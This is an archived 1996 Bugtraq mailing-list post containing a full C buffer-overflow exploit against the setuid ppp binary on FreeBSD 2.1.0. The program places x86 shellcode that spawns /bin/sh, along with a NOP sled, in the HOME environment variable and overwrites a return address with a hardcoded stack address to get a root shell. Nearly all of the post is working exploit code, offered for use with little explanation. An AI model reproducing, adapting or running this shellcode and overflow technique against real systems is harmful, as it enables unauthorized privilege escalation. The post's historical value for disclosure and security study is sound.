[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Exploit for ppp bug (FreeBSD 2.1.0).
From: Leshka Zakharoff <leshka () leshka ! chuvashia ! su>
Date: 1996-12-19 3:00:06
[Download RAW message or body]
/* ---------------------------- CUT HERE ----------------------------------- */
/* */
/* Hi ! */
/* This is buffer overflow exploit for ppp bug (FreeBSD 2.1.0). */
/* If you have any problems with it, drop me a letter. */
/* Have fun ! */
/* */
/* */
/* ---------------------- */
/* --------------------------------------------- */
/* ----------------- Dedicated to my beautiful lady ------------------ */
/* --------------------------------------------- */
/* ---------------------- */
/* */
/* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su */
#include <stdio.h>
main()
{
#define length 114
int i;
unsigned long start_addr;
char home_string[length];
char *env[]={
home_string,
NULL
};
char code_string[]=
{
"\xeb\x2a" /* jmp cont */
/* geteip: */ "\x5d" /* popl %ebp */
"\x55" /* pushl %ebp */
"\xfe\x4d\xe7" /* decb 0xffffffe7(%ebp) */
"\xfe\x4d\xeb" /* decb 0xffffffeb(%ebp) */
"\xfe\x4d\xec" /* decb 0xffffffec(%ebp) */
"\xfe\x4d\xed" /* decb 0xffffffed(%ebp) */
"\xff\x45\xef" /* incl 0xffffffef(%ebp) */
"\xfe\x4d\xf4" /* decb 0xfffffff4(%ebp) */
"\xc3" /* ret */
/* 0xffffffe0(%ebp): */ "/bin/sh"
/* 0xffffffe7(%ebp): */ "\x01"
/* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal 0x3b,%eax */
"\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0 */
/* cont: */ "\xc7\xc4XXXX" /* movl $0xXXXXXXXX,%esp */
"\xe8\xcb\xff\xff\xff" /* call geteip */
"\x81\xc5\xef\xff\xff\xff" /* addl $0xffffffef,%ebp */
"\x55" /* pushl %ebp */
"\x55" /* pushl %ebp */
"\x81\xc5\xf1\xff\xff\xff" /* addl $0xfffffff1,%ebp */
"\x55" /* pushl %ebp */
"\xe8\xd4\xff\xff\xff" /* call execve */
};
for(i=0;i<length-2;home_string[i++]='\x90'); home_string[length-1]='\0';
start_addr=0xefbfde83;
*( (unsigned long*) strstr(code_string,"XXXX") )=start_addr;
strncpy(home_string,"HOME=",5);
strncpy(&home_string[5],code_string,strlen(code_string));
*( (unsigned long*) &home_string[length-5])=start_addr;
execle("/usr/sbin/ppp","/usr/sbin/ppp",NULL,env);
}
/* ---------------------------- CUT HERE ----------------------------------- */
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic